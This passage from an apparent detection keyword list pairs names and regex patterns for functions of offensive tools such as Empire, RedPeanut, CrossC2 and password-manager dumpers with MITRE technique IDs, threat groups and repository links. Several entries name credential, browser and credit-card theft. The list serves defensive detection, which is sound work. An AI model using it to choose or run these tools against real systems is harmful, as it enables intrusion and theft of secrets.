T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*getcap not found in PATH, cannot escalate using capabilities*",".{0,1000}getcap\snot\sfound\sin\sPATH,\scannot\sescalate\susing\scapabilities.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Get-ChromeBookmarks*",".{0,1000}Get\-ChromeBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ChromeDump*",".{0,1000}Get\-ChromeDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1150","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ChromeHistory*",".{0,1000}Get\-ChromeHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetChromeSecrets*",".{0,1000}GetChromeSecrets.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*GETCLIPBOARD*GETLOCALGROUP*",".{0,1000}GETCLIPBOARD.{0,1000}GETLOCALGROUP.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*Get-ClipboardContents*",".{0,1000}Get\-ClipboardContents.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ClipboardContents.ps1*",".{0,1000}Get\-ClipboardContents\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1070","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CLSIDRegistryKeys -RegHive *",".{0,1000}Get\-CLSIDRegistryKeys\s\-RegHive\s.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*Get-CompressedAgent*",".{0,1000}Get\-CompressedAgent.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedAgent.ps1*",".{0,1000}Get\-CompressedAgent\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode*",".{0,1000}Get\-CompressedShellcode.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CompressedShellcode.ps1*",".{0,1000}Get\-CompressedShellcode\.ps1.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-ComputerDetails*",".{0,1000}Get\-ComputerDetails.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*GetComputersFromActiveDirectory*",".{0,1000}GetComputersFromActiveDirectory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-creditcarddata *",".{0,1000}get\-creditcarddata\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-CredPersist*",".{0,1000}Get\-CredPersist.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*getCreds1passwordappEntries1.h*",".{0,1000}getCreds1passwordappEntries1\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordappEntries2.h*",".{0,1000}getCreds1passwordappEntries2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordappMaster.h*",".{0,1000}getCreds1passwordappMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordplugin.h*",".{0,1000}getCreds1passwordplugin\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCreds1passwordplugin2.h*",".{0,1000}getCreds1passwordplugin2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*getCrossC2Beacon*",".{0,1000}getCrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*getCrossC2Site*",".{0,1000}getCrossC2Site.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*Get-DCBadPwdCount*",".{0,1000}Get\-DCBadPwdCount.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DCsNotOwnedByDA*",".{0,1000}Get\-DCsNotOwnedByDA.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-DecodedPassword*",".{0,1000}Get\-DecodedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-DecryptedCpassword*",".{0,1000}Get\-DecryptedCpassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-DecryptedPassword*",".{0,1000}Get\-DecryptedPassword.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-DecryptedSitelistPassword*",".{0,1000}Get\-DecryptedSitelistPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - 